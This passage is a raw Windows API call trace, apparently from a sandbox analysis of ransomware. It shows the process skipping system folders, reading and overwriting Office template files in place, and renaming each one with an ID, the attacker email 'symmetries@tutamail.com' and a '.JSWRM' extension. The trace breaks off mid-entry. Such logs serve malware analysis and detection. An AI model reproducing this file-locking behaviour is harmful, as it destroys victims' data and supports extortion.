ftLastAccessTime.dwLowDateTime=0xaee2894, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xaee2894, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc197, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="TelemetryDashboard.xltx", cAlternateFileName="TELEME~2.XLT")) returned 1 [0121.473] lstrcmpiW (lpString1="TelemetryDashboard.xltx", lpString2=".") returned 1 [0121.473] lstrcmpiW (lpString1="TelemetryDashboard.xltx", lpString2="..") returned 1 [0121.473] lstrcmpiW (lpString1="TelemetryDashboard.xltx", lpString2="...") returned 1 [0121.473] lstrcmpiW (lpString1="TelemetryDashboard.xltx", lpString2="windows") returned -1 [0121.473] lstrcmpiW (lpString1="TelemetryDashboard.xltx", lpString2="recovery") returned 1 [0121.473] lstrcmpiW (lpString1="TelemetryDashboard.xltx", lpString2="perflogs") returned 1 [0121.473] lstrcmpiW (lpString1="TelemetryDashboard.xltx", lpString2="documents and settings") returned 1 [0121.473] lstrcmpiW (lpString1="TelemetryDashboard.xltx", lpString2="$RECYCLE.BIN") returned 1 [0121.473] lstrcmpiW (lpString1="TelemetryDashboard.xltx", lpString2="system volume information") returned 1 [0121.473] lstrcmpiW (lpString1="TelemetryDashboard.xltx", lpString2="msocache") returned 1 [0121.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0121.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TelemetryDashboard.xltx", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0121.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0121.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TelemetryDashboard.xltx", cchWideChar=23, lpMultiByteStr=0x240f70, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TelemetryDashboard.xltx", lpUsedDefaultChar=0x0) returned 23 [0121.473] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0121.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0121.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TelemetryDashboard.xltx", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0121.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0121.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TelemetryDashboard.xltx", cchWideChar=23, lpMultiByteStr=0x2411c8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TelemetryDashboard.xltx", lpUsedDefaultChar=0x0) returned 23 [0121.473] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0121.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0121.473] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0121.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0121.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0121.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0121.473] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TelemetryDashboard.xltx" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\telemetrydashboard.xltx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0121.474] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=49559) returned 1 [0121.474] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.474] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc190) returned 0x24e1d8 [0121.474] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xc190, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xc190, lpOverlapped=0x0) returned 1 [0121.478] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.478] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xc190, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xc190, lpOverlapped=0x0) returned 1 [0121.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0121.480] CloseHandle (hObject=0x238) returned 1 [0121.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0121.480] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0121.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0121.480] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0121.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0121.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0121.480] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0121.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0121.480] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0121.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0121.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0121.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e688 [0121.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0121.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0121.480] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TelemetryDashboard.xltx" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\telemetrydashboard.xltx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TelemetryDashboard.xltx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\telemetrydashboard.xltx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0121.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0121.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0121.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0121.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0121.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0121.481] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xaee2894, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xaee2894, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xaee2894, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9420, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="TelemetryLog.xltx", cAlternateFileName="TELEME~1.XLT")) returned 1 [0121.481] lstrcmpiW (lpString1="TelemetryLog.xltx", lpString2=".") returned 1 [0121.481] lstrcmpiW (lpString1="TelemetryLog.xltx", lpString2="..") returned 1 [0121.481] lstrcmpiW (lpString1="TelemetryLog.xltx", lpString2="...") returned 1 [0121.481] lstrcmpiW (lpString1="TelemetryLog.xltx", lpString2="windows") returned -1 [0121.481] lstrcmpiW (lpString1="TelemetryLog.xltx", lpString2="recovery") returned 1 [0121.481] lstrcmpiW (lpString1="TelemetryLog.xltx", lpString2="perflogs") returned 1 [0121.481] lstrcmpiW (lpString1="TelemetryLog.xltx", lpString2="documents and settings") returned 1 [0121.481] lstrcmpiW (lpString1="TelemetryLog.xltx", lpString2="$RECYCLE.BIN") returned 1 [0121.481] lstrcmpiW (lpString1="TelemetryLog.xltx", lpString2="system volume information") returned 1 [0121.481] lstrcmpiW (lpString1="TelemetryLog.xltx", lpString2="msocache") returned 1 [0121.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0121.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TelemetryLog.xltx", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0121.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0121.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TelemetryLog.xltx", cchWideChar=17, lpMultiByteStr=0x2413d0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TelemetryLog.xltx", lpUsedDefaultChar=0x0) returned 17 [0121.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0121.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0121.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TelemetryLog.xltx", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0121.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0121.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TelemetryLog.xltx", cchWideChar=17, lpMultiByteStr=0x240fc0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TelemetryLog.xltx", lpUsedDefaultChar=0x0) returned 17 [0121.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0121.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0121.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0121.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0121.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0121.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0121.482] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TelemetryLog.xltx" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\telemetrylog.xltx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0121.482] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=37920) returned 1 [0121.482] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x9420) returned 0x24e1d8 [0121.483] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x9420, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0x9420, lpOverlapped=0x0) returned 1 [0121.499] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.499] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x9420, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0x9420, lpOverlapped=0x0) returned 1 [0121.499] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0121.500] CloseHandle (hObject=0x238) returned 1 [0121.500] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0121.500] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0121.500] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0121.500] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0121.500] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0121.500] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0121.500] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0121.500] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0121.500] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0121.500] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0121.500] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0121.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0121.501] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0121.501] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0121.501] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TelemetryLog.xltx" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\telemetrylog.xltx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TelemetryLog.xltx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\telemetrylog.xltx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0121.502] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0121.502] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0121.502] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0121.502] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0121.502] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0121.502] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xaee2894, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xaee2894, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xaee2894, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2d638, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="TellMeAccess.nrr", cAlternateFileName="TEF284~1.NRR")) returned 1 [0121.502] lstrcmpiW (lpString1="TellMeAccess.nrr", lpString2=".") returned 1 [0121.503] lstrcmpiW (lpString1="TellMeAccess.nrr", lpString2="..") returned 1 [0121.503] lstrcmpiW (lpString1="TellMeAccess.nrr", lpString2="...") returned 1 [0121.503] lstrcmpiW (lpString1="TellMeAccess.nrr", lpString2="windows") returned -1 [0121.503] lstrcmpiW (lpString1="TellMeAccess.nrr", lpString2="recovery") returned 1 [0121.503] lstrcmpiW (lpString1="TellMeAccess.nrr", lpString2="perflogs") returned 1 [0121.503] lstrcmpiW (lpString1="TellMeAccess.nrr", lpString2="documents and settings") returned 1 [0121.503] lstrcmpiW (lpString1="TellMeAccess.nrr", lpString2="$RECYCLE.BIN") returned 1 [0121.503] lstrcmpiW (lpString1="TellMeAccess.nrr", lpString2="system volume information") returned 1 [0121.503] lstrcmpiW (lpString1="TellMeAccess.nrr", lpString2="msocache") returned 1 [0121.503] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0121.503] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TellMeAccess.nrr", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0121.503] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0121.503] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TellMeAccess.nrr", cchWideChar=16, lpMultiByteStr=0x240fe8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TellMeAccess.nrr", lpUsedDefaultChar=0x0) returned 16 [0121.503] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0121.503] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0121.503] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TellMeAccess.nrr", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0121.503] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0121.503] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TellMeAccess.nrr", cchWideChar=16, lpMultiByteStr=0x241330, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TellMeAccess.nrr", lpUsedDefaultChar=0x0) returned 16 [0121.503] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0121.503] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0121.503] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0121.503] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0121.503] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0121.503] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0121.503] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TellMeAccess.nrr" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\tellmeaccess.nrr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0121.504] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=185912) returned 1 [0121.504] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.504] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1d8 [0121.505] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0121.517] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.517] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0121.518] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0121.518] CloseHandle (hObject=0x238) returned 1 [0121.518] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0121.518] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0121.518] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0121.518] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0121.518] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0121.518] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0121.518] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0121.518] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0121.518] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0121.518] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0121.518] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0121.518] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0121.518] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0121.518] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0121.518] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TellMeAccess.nrr" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\tellmeaccess.nrr"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TellMeAccess.nrr.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\tellmeaccess.nrr.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0121.522] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0121.522] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0121.522] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0121.522] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0121.522] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0121.522] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xaebc65e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xaebc65e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xaebc65e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5dff8, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="TellMeExcel.nrr", cAlternateFileName="TELLME~4.NRR")) returned 1 [0121.523] lstrcmpiW (lpString1="TellMeExcel.nrr", lpString2=".") returned 1 [0121.523] lstrcmpiW (lpString1="TellMeExcel.nrr", lpString2="..") returned 1 [0121.523] lstrcmpiW (lpString1="TellMeExcel.nrr", lpString2="...") returned 1 [0121.523] 